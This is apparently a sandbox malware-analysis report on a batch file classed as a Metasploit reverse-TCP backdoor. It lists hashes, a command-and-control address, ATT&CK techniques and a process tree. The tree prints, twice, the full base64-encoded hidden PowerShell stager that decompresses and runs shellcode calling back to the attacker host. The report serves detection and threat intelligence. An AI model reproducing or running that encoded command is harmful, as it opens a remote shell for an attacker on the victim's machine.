metasploit | 621e36ba1d08069c547035634154f36f91bcb94a16b081101dc74c83f6be4606

General

Target

621e36ba1d08069c547035634154f36f91bcb94a16b081101dc74c83f6be4606.bat
Size

6KB
MD5

a1cf57d1b97d8d92f26e95864db53445
SHA1

c95736a6c6b861e535cdb5cd3e9ba16f423b41a7
SHA256

621e36ba1d08069c547035634154f36f91bcb94a16b081101dc74c83f6be4606
SHA512

4a0a266d8e8a767e732069fafce717397683d3c1122caabe9432af062edb415f83202e3245887fcdce84106e6d68518de4863643da7e89649a42d4f96955a9b1
SSDEEP

192:+n2jh1hqT2+jKQ3IV1/FoOdyCqxxIyQv2dHhW:+n2jh1hsJ/IryQhqKudHhW

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

89.197.154.116:7810

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe
2	2644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3008	powershell.exe
2644	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3008	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2180 wrote to memory of 2956	2180	cmd.exe	31
PID 2180 wrote to memory of 2956	2180	cmd.exe	31
PID 2180 wrote to memory of 2956	2180	cmd.exe	31
PID 2956 wrote to memory of 3008	2956	cmd.exe	32
PID 2956 wrote to memory of 3008	2956	cmd.exe	32
PID 2956 wrote to memory of 3008	2956	cmd.exe	32
PID 3008 wrote to memory of 2644	3008	powershell.exe	33
PID 3008 wrote to memory of 2644	3008	powershell.exe	33
PID 3008 wrote to memory of 2644	3008	powershell.exe	33
PID 3008 wrote to memory of 2644	3008	powershell.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\621e36ba1d08069c547035634154f36f91bcb94a16b081101dc74c83f6be4606.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABRAHkANwBHAFkAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAJwAnACsAJwAnACsAWABxAG4ALwB3AGEAcQBRAGIASwBzAEUARwA4AEsAbABUAGEAUgBLAHQAegBhAHYATABSAEEAVABCAHcAaAB3ADYATABTAHgAewAxAH0AMwB2AEQAMgBrAHYAcwBkAFEAagBwADkAYgAvAGYAcgBNAEUASgB2AFMAYQA5ADMARQBtAHsAMAB9AGwATABBAHYATQA3AE8AegB6AHoAdwB6AHMAOABzAHMAOQBnAFQAbABzAFoASgBVAGwAYQA5AHYAMwB5AGoANwB6ADgARQBKAGoAaABTAHQAZABIAC8AagBsAFoAWABTAFgAUQAyAEgAKwB0AE4AbQA2AGIAWQAyAHYAVgBVACsASwBkAG8AYwByAGQAYwBOAEgAbQBFAGEATAA4ADcATwA3AEMAeABKAFMAQwB4ADIAOAAwAHEAYgBDAEoAUwBtAEoATABwAG0AbABLACcAJwArACcAJwBTAGEAcgB2AHkAbABUAEUASwBTAGsASwBQAHoANgB4AHYAaQBDAGUAVwByAFUAdgBxAHoAJwAnACsAJwAnADAAbQBiADgARwByAE8AOQAyAE4AYgBHAFgAawBpAFUASQB4AFQANwBjAHEALwBIAFAAUwB6ADkAcQByAGgAcgAnACcAKwAnACcAUgBvAFcAbQAvAHYARwBIAHEAcwArAFAAcQBvAHQASwA4AHoAYgBEAEwATgBWAFUAZAA1AHMASwBFAGwAVgA4AHgAbABSAGQAKwBhAGIATABBAHkAKwAzAGEANgBLAHAAZgBlAG8AbABQAE8AVgBMAFUAWgBuAFEAKwBMAGgAVwBHAGMAVQBwAFgAcABJAEIAVwBMAHMAagBmAFMASgBDADcAcQBjAHEAWABPAGIAcABPAGcAawBSAFcAUgBMAHYAYgBpAFgATgA3AEkAUQAwAHsAMQB9AFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBzAHoATwBVAEIAOAA4AFgAaQBkADIAMgArAFAALwAwAGkAaQB3AFcATgBTAEsAVQBiAEMANQBMAHcAdABVAHUAUwBPACsAcQBSAHQATgBMAEIAcwBjAC8ASQBCAFYAawB1AFEATQBzAFYAQwBZADIARABoAGEANgBEADIAQgB7ADAAfQBmAEUAYQAwAFUAWgA0AHkAVgBsAGYAOQBpAFIAaAB1AFEAVABZAEgAZABhADUAVwAwAFEAeQBXAFEAYwBrAFMAaQBsAHkARwBtAHoAOQB5AHoAegAvADIATQBrAFoAMgBtACsAbwB5AGoAawBnAGMANgBmAEEAVQBYAEEATAA5AHYARQBzAEoAbAB3AFIANwA4AFUAQgBzAE4AbgB5AEgAUQAwADAATAB4AHoAZgBNAGQAQQBqADUAcgBEAGsAOQBwAHIAdgB7ADAAfQBKAE0AYwB0AEsASAAnACcAKwAnACcAMAA3AEgAZwBpAGQAYgBtAEoAWQB1AGsANAB6AG8AaQAwAGYARQBsAFoASgAvADAAeQBpAC8AewAwAH0AbABpAHsAMAB9ADAAQQBTADkAdABOAG4AZQBuAHMARABhAGYATQB5AHAAdgAzAGkAeQA4AEIAMABEAFMAdAB3AFoAOQBLAFQAUQB5ADMAeAB1AGsAQwBXAE4AUwBXAE0AYgA0ADQAaAA2AEIAVwBXAHsAMAB9ADUAOABKAEMAbABvAHoAawBvAHsAMQB9AFEASwBzAFEARwA0AHEASwBuADcARABlAEkAMwBDAEMATQBCAHsAMQB9AGgASgBvAHkAWQA0AGYAewAwAH0ASgBvAFIAewAxAH0AWQArADYAVgBrAGEAWgBUAHgATABrAFEAVwBoAFQAOABBAHEAaQByAG4ALwB2ACcAJwArACcAJwB6AEMANQAyAG0AdABxAE4AKwB5AFEAQwArAEgAWgB6AG8ARwB0AHAAQwBZAGwAQwBDAHUAbAA5AGMAbQB5AEwAMAArAFUAYwBoAHsAMQB9AFMAYgA0AFQAUQB0AEsAMAA0AEcAbQBRAHEANQA3AGgATABNAGkAewAxAH0AOQBXAFUASgB6AFMALwBSAGIASwBCAE0AKwBIADYAcABPADcALwBZAHcASgA2AHUAewAxAH0AVQB7ADEAfQBPAFkAVwArAGoALwBnADMAQgA5AHIAOAB6AGcAVgBTAGUAWgBCAFkAQQBHAEMAUwAzAGQATgBQAEkAcQBaAFIASwBTAHMAZABLAGgAUAByAEsAewAwAH0ATABnACsAJwAnACsAJwAnAEoANAA5AFYAJwAnACsAJwAnAGsAOABiAE0AdwBZAEoAQgBCAFkAdQBvAE4ANAB3AEkAcgBFAHcAUgBXAFMATABnAGwANABLAHEAbQBoAFYAewAwAH0AdwBpAHUAdABHACcAJwArACcAJwBhAGsAUQBoAEUAOABzAEwAUgBZAGoAaQBBAE0AcgBIAFAAawBwAHgAZQBPAEMAQwArACsAbwBLAGYAUgBUAEwAcwBtAEMAKwBCAEsAUgBBADUAOABCAEsAaQA3AFQASQB1AHkAcwBxAFkASgBnAEwASwBrAEEAUQA1AEoAOQBqAC8AOABlAEwASABBAHAAUwA3AFkAeQBkAGsASAB4ADIAdAB5AEwASwA1AHQAUgBVAHkAQwAwAHIATABLAEcAJwAnACsAJwAnAGYAcABIAHEASQBjAGsARQBRAEEARwBLADIARQBSAHgAWgBPAHkAVQBsADkAVgAyAHUAMABkADgAWQA1AGQAUgBCADgAMAAwAGIASABuAFgAVwB7ADEAfQAyACsALwBHAGoAewAxAH0AYQA3AGYAZgBnAGIAOQBaAGYAdgBlAHgANABOAEgARwBIAHkAcQBPAC8AWgBxAGQATgB1AGYAVQBSADAARQAyAHkAOABqAHcAUABrACsAWgA5ADkAYwB1AHEATwA2ADgASgB0AGQAbwBYAHQAbwBNADYAUQBtAGwAWQA5ADkAQwB6AHoAVQBvADYAcgBRAFUARABOAFkARABwAEMAbgBjAHYAUQBZADYAYgBUAGoASABxAEQAYgBuAHAAdgBiAEQAbwBUAGEAVwB0AG4AdwA2AHYAWABPAHsAMAB9AGMAbQBPAGoANgB1AG4AeAArAGIASwA0AEIAdgBDAG4AbwByADUAQQA4AGkAdQByAG4AdgB3AFIAaQBLADYAbgBuAFAANgBxAGEAVwAyAFcAWABOAHoALwBiAHsAMQB9ADkAYQBUAFcAbQBrAHsAMAB9AFkAeAA2AGkAMwB3AHUAVwBFAHAAKwA3AEoAdABHAEUAWQB4AHEAbQBQAEcALwAwAHQAUQBoAGIAMwBqAC8AdgBiAHEAKwBvAHsAMQB9AHYAKwB4ADQAawBWAFcAUAB1AFgAewAxAH0AcQB7ADAAfQB7ADAAfQAnACcAKwAnACcAZQBvAGkAWgBBAGQATgA4AGMAdABpADMAKwBaAFcAZwBsAHkAagBEAEUATwB7ADAAfQBuAHoAaQBUAGIARABmAEQAbQB4AGsAbgBkAGkAVQB6AEkAYQBqAGwAagBVAGMAdABpAHcAMABhAHQALwBjAE4AawA2AE4AdwBEAGkAZABYAE8ASABRAG0AbwB4AHIAZABMAGEAKwB1AGcAaABoADMAdABwADAAaABsADgATQBzADkANwB7ADAAfQB5AFEATwBmAGIAUQBDADQATgBrAGMANAB1AEEAQwBaAHcASwA1ADUANABSAEoAawBHAHUAKwBSADkAWAA3AEEAMAB4AHAAZQBXAFIAeABaAEkATgBPAGEAMwBhAEoAMgBPAHsAMQB9ADIAMwBIAEEAYgA3AGwANgBNAGEAUgAyAE0AMgB1AE0ASwBvAE4AOQB1ADIARABLAE0ANgBkAGUAcQBvAFkALwBKAEoATwAwAEIARABFAE0AZQBCAE4AYwBRAG8AJwAnACsAJwAnAHYAVwBzADgATgBJAHoAcQAyAE8AZgArADUATABmAEIAZABHAG0ATQByADkAZwBIAG8AMgBFAFAAbgBmAEIASwAzAHQAbABZAFIALwBMAC8AcAB0AFAANAA0AHMAMgBxAEcAKwAvADgAdwA4AGYAZQBoAEkANABqAGoAawBhAEcATQBYADQASABuAEoAaQBQAGEAQwB5AE8AYQA0AHMAUwBiAFoANgBjAFMAMABLAFkAYgA5ACsAVQArAEgAewAwAH0AMgBRAEkAMgBYAGUAawBNAGYASgAyAG0ASQBHAFYAQQAnACcAKwAnACcARwBpAG4ANgBSAHUAaQAyACcAJwArACcAJwBlAHQAUABaAHsAMAB9ADMATwB7ADEAfQBVAGEAbQBnAGEAdgAnACcAKwAnACcAQQBaAFcASgBJAGsASgBnAHcAWQBLAEwAYgBZAGcAUABHAEsATQBlADcASwBKADcATwBvADkAZABMAEIAZABYADUAewAxAH0AdABiACcAJwArACcAJwB0AFQATgB2AFgAcAB1AHAAQwB1AFAAZwB2AHAAVABkAHkAbQBXAHoAcwA1AG0ANABLAFMAcwBWAHsAMAB9AEcAdgAwAGkAJwAnACsAJwAnAE4AeABJAE0ASwB5AGUAWAA5ACcAJwArACcAJwBzAG0AdABBAFUAegBIAHUAegBuAHUAZgBLADYAMgA5AG0AOAAvAFYAVwBrADcAYgBLAHMAcQB0AEkAWQBQAGEAbQBXAFcANABhAHIATgBHAGwAbwBtAG0ALwBHAGkAcAA0AE8AZwBnAG8AWQBEADgAQgA2AHkAWABjADQATwBnAFYAVgBCAHkAbwBnAEwAcwBxAEkATgBHAHoATwBHAGUASAAyAE8AMgB1ADkAYwBpAEUAQQArAFEAQQBzAGkAcgBjAGUAeQA1AGYARABUAHUARwBnAEkARQBqAGMAcQB1AFUAaABPAHkAcABoAHoAMgA2ADkARwBCADMAZgB5AFYAcAA5AHEAVQBzAGgAQgAvAC8AWAAwAG4AJwAnACsAJwAnAHoAdABQAGEAVAAnACcAKwAnACcAMwBWAGMAUgB5AFMAegBuADYAUAB5AHcAKwB2ADMAQwBRAFIALwA0AFoAUQBCAE0ATQBCAFUAZwA1ADAASgBKAFoAbQBUADMAVABIAGcAQgBoADMAMgBlAEgAQQBRAFkAWQBnAE4AWgBzAE4AeAAvADgAZwB7ADEAfQA5AG4AbwBtAGoAQQBUAHoASQA4AHEANwB3AE4ALwAwAEcAMgBwAEMANABDAHcAQQBBACcAJwApAC0AZgAnACcAMQAnACcALAAnACcARgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABRAHkANwBHAFkAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAJwAnACsAJwAnACsAWABxAG4ALwB3AGEAcQBRAGIASwBzAEUARwA4AEsAbABUAGEAUgBLAHQAegBhAHYATABSAEEAVABCAHcAaAB3ADYATABTAHgAewAxAH0AMwB2AEQAMgBrAHYAcwBkAFEAagBwADkAYgAvAGYAcgBNAEUASgB2AFMAYQA5ADMARQBtAHsAMAB9AGwATABBAHYATQA3AE8AegB6AHoAdwB6AHMAOABzAHMAOQBnAFQAbABzAFoASgBVAGwAYQA5AHYAMwB5AGoANwB6ADgARQBKAGoAaABTAHQAZABIAC8AagBsAFoAWABTAFgAUQAyAEgAKwB0AE4AbQA2AGIAWQAyAHYAVgBVACsASwBkAG8AYwByAGQAYwBOAEgAbQBFAGEATAA4ADcATwA3AEMAeABKAFMAQwB4ADIAOAAwAHEAYgBDAEoAUwBtAEoATABwAG0AbABLACcAJwArACcAJwBTAGEAcgB2AHkAbABUAEUASwBTAGsASwBQAHoANgB4AHYAaQBDAGUAVwByAFUAdgBxAHoAJwAnACsAJwAnADAAbQBiADgARwByAE8AOQAyAE4AYgBHAFgAawBpAFUASQB4AFQANwBjAHEALwBIAFAAUwB6ADkAcQByAGgAcgAnACcAKwAnACcAUgBvAFcAbQAvAHYARwBIAHEAcwArAFAAcQBvAHQASwA4AHoAYgBEAEwATgBWAFUAZAA1AHMASwBFAGwAVgA4AHgAbABSAGQAKwBhAGIATABBAHkAKwAzAGEANgBLAHAAZgBlAG8AbABQAE8AVgBMAFUAWgBuAFEAKwBMAGgAVwBHAGMAVQBwAFgAcABJAEIAVwBMAHMAagBmAFMASgBDADcAcQBjAHEAWABPAGIAcABPAGcAawBSAFcAUgBMAHYAYgBpAFgATgA3AEkAUQAwAHsAMQB9AFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBzAHoATwBVAEIAOAA4AFgAaQBkADIAMgArAFAALwAwAGkAaQB3AFcATgBTAEsAVQBiAEMANQBMAHcAdABVAHUAUwBPACsAcQBSAHQATgBMAEIAcwBjAC8ASQBCAFYAawB1AFEATQBzAFYAQwBZADIARABoAGEANgBEADIAQgB7ADAAfQBmAEUAYQAwAFUAWgA0AHkAVgBsAGYAOQBpAFIAaAB1AFEAVABZAEgAZABhADUAVwAwAFEAeQBXAFEAYwBrAFMAaQBsAHkARwBtAHoAOQB5AHoAegAvADIATQBrAFoAMgBtACsAbwB5AGoAawBnAGMANgBmAEEAVQBYAEEATAA5AHYARQBzAEoAbAB3AFIANwA4AFUAQgBzAE4AbgB5AEgAUQAwADAATAB4AHoAZgBNAGQAQQBqADUAcgBEAGsAOQBwAHIAdgB7ADAAfQBKAE0AYwB0AEsASAAnACcAKwAnACcAMAA3AEgAZwBpAGQAYgBtAEoAWQB1AGsANAB6AG8AaQAwAGYARQBsAFoASgAvADAAeQBpAC8AewAwAH0AbABpAHsAMAB9ADAAQQBTADkAdABOAG4AZQBuAHMARABhAGYATQB5AHAAdgAzAGkAeQA4AEIAMABEAFMAdAB3AFoAOQBLAFQAUQB5ADMAeAB1AGsAQwBXAE4AUwBXAE0AYgA0ADQAaAA2AEIAVwBXAHsAMAB9ADUAOABKAEMAbABvAHoAawBvAHsAMQB9AFEASwBzAFEARwA0AHEASwBuADcARABlAEkAMwBDAEMATQBCAHsAMQB9AGgASgBvAHkAWQA0AGYAewAwAH0ASgBvAFIAewAxAH0AWQArADYAVgBrAGEAWgBUAHgATABrAFEAVwBoAFQAOABBAHEAaQByAG4ALwB2ACcAJwArACcAJwB6AEMANQAyAG0AdABxAE4AKwB5AFEAQwArAEgAWgB6AG8ARwB0AHAAQwBZAGwAQwBDAHUAbAA5AGMAbQB5AEwAMAArAFUAYwBoAHsAMQB9AFMAYgA0AFQAUQB0AEsAMAA0AEcAbQBRAHEANQA3AGgATABNAGkAewAxAH0AOQBXAFUASgB6AFMALwBSAGIASwBCAE0AKwBIADYAcABPADcALwBZAHcASgA2AHUAewAxAH0AVQB7ADEAfQBPAFkAVwArAGoALwBnADMAQgA5AHIAOAB6AGcAVgBTAGUAWgBCAFkAQQBHAEMAUwAzAGQATgBQAEkAcQBaAFIASwBTAHMAZABLAGgAUAByAEsAewAwAH0ATABnACsAJwAnACsAJwAnAEoANAA5AFYAJwAnACsAJwAnAGsAOABiAE0AdwBZAEoAQgBCAFkAdQBvAE4ANAB3AEkAcgBFAHcAUgBXAFMATABnAGwANABLAHEAbQBoAFYAewAwAH0AdwBpAHUAdABHACcAJwArACcAJwBhAGsAUQBoAEUAOABzAEwAUgBZAGoAaQBBAE0AcgBIAFAAawBwAHgAZQBPAEMAQwArACsAbwBLAGYAUgBUAEwAcwBtAEMAKwBCAEsAUgBBADUAOABCAEsAaQA3AFQASQB1AHkAcwBxAFkASgBnAEwASwBrAEEAUQA1AEoAOQBqAC8AOABlAEwASABBAHAAUwA3AFkAeQBkAGsASAB4ADIAdAB5AEwASwA1AHQAUgBVAHkAQwAwAHIATABLAEcAJwAnACsAJwAnAGYAcABIAHEASQBjAGsARQBRAEEARwBLADIARQBSAHgAWgBPAHkAVQBsADkAVgAyAHUAMABkADgAWQA1AGQAUgBCADgAMAAwAGIASABuAFgAVwB7ADEAfQAyACsALwBHAGoAewAxAH0AYQA3AGYAZgBnAGIAOQBaAGYAdgBlAHgANABOAEgARwBIAHkAcQBPAC8AWgBxAGQATgB1AGYAVQBSADAARQAyAHkAOABqAHcAUABrACsAWgA5ADkAYwB1AHEATwA2ADgASgB0AGQAbwBYAHQAbwBNADYAUQBtAGwAWQA5ADkAQwB6AHoAVQBvADYAcgBRAFUARABOAFkARABwAEMAbgBjAHYAUQBZADYAYgBUAGoASABxAEQAYgBuAHAAdgBiAEQAbwBUAGEAVwB0AG4AdwA2AHYAWABPAHsAMAB9AGMAbQBPAGoANgB1AG4AeAArAGIASwA0AEIAdgBDAG4AbwByADUAQQA4AGkAdQByAG4AdgB3AFIAaQBLADYAbgBuAFAANgBxAGEAVwAyAFcAWABOAHoALwBiAHsAMQB9ADkAYQBUAFcAbQBrAHsAMAB9AFkAeAA2AGkAMwB3AHUAVwBFAHAAKwA3AEoAdABHAEUAWQB4AHEAbQBQAEcALwAwAHQAUQBoAGIAMwBqAC8AdgBiAHEAKwBvAHsAMQB9AHYAKwB4ADQAawBWAFcAUAB1AFgAewAxAH0AcQB7ADAAfQB7ADAAfQAnACcAKwAnACcAZQBvAGkAWgBBAGQATgA4AGMAdABpADMAKwBaAFcAZwBsAHkAagBEAEUATwB7ADAAfQBuAHoAaQBUAGIARABmAEQAbQB4AGsAbgBkAGkAVQB6AEkAYQBqAGwAagBVAGMAdABpAHcAMABhAHQALwBjAE4AawA2AE4AdwBEAGkAZABYAE8ASABRAG0AbwB4AHIAZABMAGEAKwB1AGcAaABoADMAdABwADAAaABsADgATQBzADkANwB7ADAAfQB5AFEATwBmAGIAUQBDADQATgBrAGMANAB1AEEAQwBaAHcASwA1ADUANABSAEoAawBHAHUAKwBSADkAWAA3AEEAMAB4AHAAZQBXAFIAeABaAEkATgBPAGEAMwBhAEoAMgBPAHsAMQB9ADIAMwBIAEEAYgA3AGwANgBNAGEAUgAyAE0AMgB1AE0ASwBvAE4AOQB1ADIARABLAE0ANgBkAGUAcQBvAFkALwBKAEoATwAwAEIARABFAE0AZQBCAE4AYwBRAG8AJwAnACsAJwAnAHYAVwBzADgATgBJAHoAcQAyAE8AZgArADUATABmAEIAZABHAG0ATQByADkAZwBIAG8AMgBFAFAAbgBmAEIASwAzAHQAbABZAFIALwBMAC8AcAB0AFAANAA0AHMAMgBxAEcAKwAvADgAdwA4AGYAZQBoAEkANABqAGoAawBhAEcATQBYADQASABuAEoAaQBQAGEAQwB5AE8AYQA0AHMAUwBiAFoANgBjAFMAMABLAFkAYgA5ACsAVQArAEgAewAwAH0AMgBRAEkAMgBYAGUAawBNAGYASgAyAG0ASQBHAFYAQQAnACcAKwAnACcARwBpAG4ANgBSAHUAaQAyACcAJwArACcAJwBlAHQAUABaAHsAMAB9ADMATwB7ADEAfQBVAGEAbQBnAGEAdgAnACcAKwAnACcAQQBaAFcASgBJAGsASgBnAHcAWQBLAEwAYgBZAGcAUABHAEsATQBlADcASwBKADcATwBvADkAZABMAEIAZABYADUAewAxAH0AdABiACcAJwArACcAJwB0AFQATgB2AFgAcAB1AHAAQwB1AFAAZwB2AHAAVABkAHkAbQBXAHoAcwA1AG0ANABLAFMAcwBWAHsAMAB9AEcAdgAwAGkAJwAnACsAJwAnAE4AeABJAE0ASwB5AGUAWAA5ACcAJwArACcAJwBzAG0AdABBAFUAegBIAHUAegBuAHUAZgBLADYAMgA5AG0AOAAvAFYAVwBrADcAYgBLAHMAcQB0AEkAWQBQAGEAbQBXAFcANABhAHIATgBHAGwAbwBtAG0ALwBHAGkAcAA0AE8AZwBnAG8AWQBEADgAQgA2AHkAWABjADQATwBnAFYAVgBCAHkAbwBnAEwAcwBxAEkATgBHAHoATwBHAGUASAAyAE8AMgB1ADkAYwBpAEUAQQArAFEAQQBzAGkAcgBjAGUAeQA1AGYARABUAHUARwBnAEkARQBqAGMAcQB1AFUAaABPAHkAcABoAHoAMgA2ADkARwBCADMAZgB5AFYAcAA5AHEAVQBzAGgAQgAvAC8AWAAwAG4AJwAnACsAJwAnAHoAdABQAGEAVAAnACcAKwAnACcAMwBWAGMAUgB5AFMAegBuADYAUAB5AHcAKwB2ADMAQwBRAFIALwA0AFoAUQBCAE0ATQBCAFUAZwA1ADAASgBKAFoAbQBUADMAVABIAGcAQgBoADMAMgBlAEgAQQBRAFkAWQBnAE4AWgBzAE4AeAAvADgAZwB7ADEAfQA5AG4AbwBtAGoAQQBUAHoASQA4AHEANwB3AE4ALwAwAEcAMgBwAEMANABDAHcAQQBBACcAJwApAC0AZgAnACcAMQAnACcALAAnACcARgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3008
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
